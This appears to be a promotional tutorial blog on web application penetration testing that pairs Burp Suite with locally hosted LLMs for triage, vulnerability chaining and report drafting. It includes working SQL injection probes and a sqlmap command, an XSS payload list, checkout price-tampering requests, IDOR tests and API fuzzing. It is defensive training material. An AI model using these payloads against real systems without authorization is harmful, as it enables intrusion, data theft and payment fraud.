Web Application Penetration Testing

Web application penetration testing has evolved significantly. Modern assessments combine the precision of Burp Suite Professional with locally hosted AI models to uncover vulnerabilities that automated scanners miss and that manual testing alone would take days to surface. Running AI locally matters in professional engagements because client data, request payloads, and vulnerability details never leave the tester's machine, keeping the engagement clean from a data handling perspective.

This guide walks through how professional red teams approach web application assessments in 2026, with real Burp Suite workflows and local LLM integration built into every phase.

If you want professional-grade assessments delivered by experienced practitioners, Redfox Cybersecurity provides web application penetration testing services that combine proven methodology with modern tooling.

Why Local LLMs Matter in Penetration Testing

Sending application traffic, endpoint structures, and vulnerability details to a cloud-based AI API during a client engagement is a data handling risk most professional testers avoid. Locally hosted models via Ollama give you AI-assisted analysis with zero data exfiltration. In 2026, models like Llama 3.1, Mistral, and DeepSeek-Coder running locally are capable enough to meaningfully assist with attack surface triage, payload generation logic, and report drafting.

# Install Ollama on Kali Linux
curl -fsSL https://ollama.com/install.sh | sh

# Pull a capable model for security analysis tasks
ollama pull llama3.1:70b

# Verify it is running and accessible via local API
curl http://localhost:11434/api/tags | jq '.models[].name'

# Run a quick sanity check
ollama run llama3.1:70b "List five common web application vulnerability classes."


[cta]

Ollama exposes a local REST API on port 11434 that mirrors the structure of cloud AI APIs, which means it integrates cleanly into Python scripts and automation pipelines without any external dependencies.

Setting Up Burp Suite for a Professional Engagement

Before any testing begins, Burp Suite needs to be configured correctly. Scope, proxy settings, and upstream routing all affect the quality of traffic capture.

# Export Burp's CA certificate and install in Firefox
# Burp > Proxy > Options > Import / Export CA Certificate
# Export as DER, then import:
# Firefox > about:preferences#privacy > Certificates > Import

# Route Burp through a SOCKS5 proxy if operating over a VPN tunnel
# Burp > User Options > Connections > Upstream Proxy Servers
# Host: 127.0.0.1 | Port: 1080 | Type: SOCKS5

# Launch Burp headless for automated scanning in CI/CD pipelines
java -jar burpsuite_pro.jar \
 --project-file=engagement.burp \
 --config-file=burp_config.json \
 --unpause-spider-and-scanner


[cta]

Scoping the Engagement in Burp Suite

Tight scoping prevents noise and protects against accidental out-of-scope testing.

# Burp Suite Target > Scope > Include in Scope
Protocol: HTTPS
Host: ^target\.com$
Port: 443
File: .*

Protocol: HTTPS
Host: ^api\.target\.com$
Port: 443
File: /v1/.*

# Burp Suite Target > Scope > Exclude from Scope
File: ^/logout.*
File: ^/password-reset.*


[cta]

Phase 1: Reconnaissance with Burp Suite and Local AI Triage

Passive Crawling and Site Map Building

With Burp's proxy active, manual browsing populates the site map automatically. Supplement this with active crawling tools.

# Enumerate subdomains and probe for live hosts
subfinder -d target.com -silent | \
 httpx -status-code -title -tech-detect -json -o live_hosts.jsonl

# Deep crawl with Katana, routing through Burp proxy
katana -u https://target.com \
 -jc \
 -d 5 \
 -proxy http://127.0.0.1:8080 \
 -o crawl_output.txt

# Import discovered URLs into Burp via REST API
curl -s http://localhost:1337/v0.1/target/scope \
 -X PUT \
 -H "Content-Type: application/json" \
 -d '{"include": [{"enabled": true, "host": "target.com"}]}'


[cta]

AI-Assisted Attack Surface Triage with Local LLM

Once the Burp site map is populated, export it and pipe it through a locally hosted model to prioritize where human testing effort should focus.

# Feed Burp sitemap export into local Ollama instance
# for attack surface prioritization
import json
import requests

def query_local_llm(prompt: str, model: str = "llama3.1:70b") -> str:
   response = requests.post(
       "http://localhost:11434/api/generate",
       json={
           "model": model,
           "prompt": prompt,
           "stream": False,
           "options": {
               "temperature": 0.2,
               "num_predict": 2000
           }
       },
       timeout=120
   )
   return response.json()["response"]

with open("burp_sitemap_export.xml", "r") as f:
   sitemap_data = f.read()

prompt = f"""
You are a senior web application penetration tester.
Analyze this Burp Suite sitemap export and return a JSON object with:
- high_risk_endpoints: top 10 endpoints most likely to contain vulnerabilities
- injection_candidates: parameters most likely vulnerable to SQLi, XSS, SSTI
- logic_targets: endpoints that suggest sensitive business workflows
- auth_patterns: authentication or session management patterns worth probing

Return only valid JSON. No preamble. No explanation outside the JSON.

Sitemap:
{sitemap_data[:6000]}
"""

result = query_local_llm(prompt)

try:
   analysis = json.loads(result)
   print(json.dumps(analysis, indent=2))
except json.JSONDecodeError:
   print(result)


[cta]

This approach keeps all sitemap data, endpoint structures, and parameter names entirely on the local machine. Nothing reaches an external service. For teams handling sensitive client environments, Redfox Cybersecurity Academy covers privacy-conscious AI-assisted testing methodologies in its advanced web application security course track.

Phase 2: Vulnerability Testing with Burp Suite

SQL Injection: Manual Confirmation in Repeater, Then Automation

# Step 1: Capture request in Burp Proxy, send to Repeater (Ctrl+R)

# Original request:
GET /api/products?category=electronics HTTP/1.1
Host: target.com
Authorization: Bearer eyJhbGc...

# Error-based probe:
GET /api/products?category=electronics' HTTP/1.1

# Boolean-based blind probe:
GET /api/products?category=electronics' AND '1'='1
GET /api/products?category=electronics' AND '1'='2

# Time-based blind probe (PostgreSQL):
GET /api/products?category=electronics'; SELECT pg_sleep(5)-- -
# Step 2: Once confirmed in Repeater, export the raw request
# Right-click in Repeater > Copy to file > request.txt

# Step 3: Run sqlmap against the saved request file
sqlmap -r request.txt \
 --dbms=postgresql \
 --level=4 \
 --risk=2 \
 --technique=BT \
 --batch \
 --threads=5 \
 --output-dir=./sqlmap_results/


[cta]

XSS Testing with DOM Invader and Burp Intruder

Burp's DOM Invader is the most efficient tool for finding DOM-based XSS in JavaScript-heavy single-page applications.

# Enable DOM Invader:
# Proxy > Intercept > Open Browser > DOM Invader (top-right toggle)
# Enable: DOM Invader ON, Postmessage interception ON
# DOM Invader injects a canary string into all DOM sinks and
# fires an alert when controlled input reaches a dangerous context

# For reflected XSS via Burp Intruder:
# Send parameterized request to Intruder (Ctrl+I)
# Payload position: mark the parameter value
# Attack type: Sniper
# Payload list for Burp Intruder XSS testing (xss_burp.txt)
"><script>alert(document.domain)</script>
"><img src=x onerror=alert(1)>
'"><svg/onload=alert(1)>
<details open ontoggle=alert(1)>
"><iframe srcdoc="<script>alert(1)<\/script>">
javascript:alert(document.cookie)
{{constructor.constructor('alert(1)')()}}
${alert(1)}


[cta]

Business Logic Testing in Burp Repeater

Business logic vulnerabilities require manual, iterative testing. No scanner finds them reliably.

# Price manipulation test in a checkout flow
# Capture the checkout POST in Burp Proxy, send to Repeater

POST /api/cart/checkout HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer <token>

{
 "items": [{"product_id": "PRD-1042", "quantity": 1, "unit_price": 299.99}],
 "total": 299.99
}

# Modify in Repeater:
{
 "items": [{"product_id": "PRD-1042", "quantity": 1, "unit_price": 0.01}],
 "total": 0.01
}

# Also test negative quantity for credit abuse:
{
 "items": [{"product_id": "PRD-1042", "quantity": -1, "unit_price": 299.99}],
 "total": -299.99
}


[cta]

For organizations that need their payment flows, multi-step workflows, and access control logic tested by practitioners who understand application architecture, Redfox Cybersecurity delivers assessments that automated tools cannot replicate.

Phase 3: AI-Assisted Vulnerability Chaining with Local LLM

Vulnerability chaining is one of the highest-value activities in a penetration test. Two medium-severity findings often combine into a critical attack path. A locally hosted LLM can reason across all confirmed findings and surface chains a tester might not immediately see.

import requests
import json

def query_local_llm(prompt: str, model: str = "llama3.1:70b") -> str:
   response = requests.post(
       "http://localhost:11434/api/generate",
       json={
           "model": model,
           "prompt": prompt,
           "stream": False,
           "options": {"temperature": 0.1, "num_predict": 1500}
       },
       timeout=120
   )
   return response.json()["response"]

findings = [
   {
       "id": "F-01",
       "type": "IDOR",
       "detail": "GET /api/users/{id}/documents returns any user's files if ID is known",
       "severity": "Medium"
   },
   {
       "id": "F-02",
       "type": "Username Enumeration",
       "detail": "Login endpoint returns 'user not found' vs 'invalid password' separately",
       "severity": "Low"
   },
   {
       "id": "F-03",
       "type": "Stored XSS",
       "detail": "User bio field renders unsanitized HTML in the admin dashboard",
       "severity": "Medium"
   }
]

prompt = f"""
You are a senior penetration tester. Analyze these confirmed findings
and identify all possible vulnerability chains that elevate their
combined severity. For each chain describe:
1. Attack steps in order
2. Combined business impact
3. Recommended remediation priority

Findings:
{json.dumps(findings, indent=2)}

Return only valid JSON with key: chains (array of chain objects).
"""

result = query_local_llm(prompt)
print(result)


[cta]

Phase 4: API Testing with Burp Suite

Intercepting REST and GraphQL APIs

# Test JWT-protected API endpoint for IDOR in Burp Repeater
GET /api/v2/invoices/INV-00847 HTTP/1.1
Host: api.target.com
Authorization: Bearer <attacker_jwt>

# Test HTTP method override for hidden DELETE/PUT functionality
POST /api/v2/invoices/INV-00847 HTTP/1.1
Host: api.target.com
X-HTTP-Method-Override: DELETE
Authorization: Bearer <token>

# Test GraphQL introspection
POST /graphql HTTP/1.1
Host: target.com
Content-Type: application/json

{"query": "{ __schema { types { name fields { name } } } }"}
# Fuzz undocumented API endpoints
ffuf -u https://api.target.com/v2/FUZZ \
 -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
 -H "Authorization: Bearer <token>" \
 -mc 200,201,204,400 \
 -t 30 \
 -o api_fuzz.json


[cta]

Phase 5: AI-Assisted Report Writing with Local LLM

Report quality directly affects the value a client receives. A locally hosted model can draft structured findings from raw tester notes, keeping sensitive engagement details off external services.

import requests

def query_local_llm(prompt: str, model: str = "llama3.1:70b") -> str:
   response = requests.post(
       "http://localhost:11434/api/generate",
       json={
           "model": model,
           "prompt": prompt,
           "stream": False,
           "options": {"temperature": 0.15, "num_predict": 1200}
       },
       timeout=120
   )
   return response.json()["response"]

raw_notes = """
IDOR in /api/users/{id}/documents.
Tested with own account ID 1042 and another user ID 1043.
Both returned HTTP 200 with full document listing.
Used attacker session token for the ID 1043 request.
Documents included contracts and invoices.
No ownership validation on the server side.
"""

prompt = f"""
You are a professional penetration test report writer.
Convert these raw testing notes into a structured finding containing:
- Finding Title
- CWE Reference
- CVSS v3.1 Score and Vector String
- Description (2-3 sentences, technical but clear)
- Reproduction Steps (numbered, precise)
- Business Impact (focused on data exposure risk)
- Remediation Recommendation (specific and actionable)

Raw notes:
{raw_notes}
"""

print(query_local_llm(prompt))


[cta]

Key Takeaways

Web application penetration testing in 2026 is most effective when Burp Suite's deep traffic analysis and manual exploitation capabilities are paired with the reasoning speed of locally hosted AI. Running models like Llama 3.1 via Ollama keeps client data on the tester's machine throughout the engagement, which is the correct approach for professional assessments.

The workflows in this guide represent how experienced practitioners actually work: methodical reconnaissance, manual confirmation of every vulnerability before automation, iterative business logic testing in Repeater, and AI-assisted triage and reporting that accelerates the process without replacing judgment.

To build these skills with real lab environments, explore the training programs at Redfox Cybersecurity Academy. For organizations ready to put their applications through a professional assessment, Redfox Cybersecurity delivers thorough, methodology-driven results.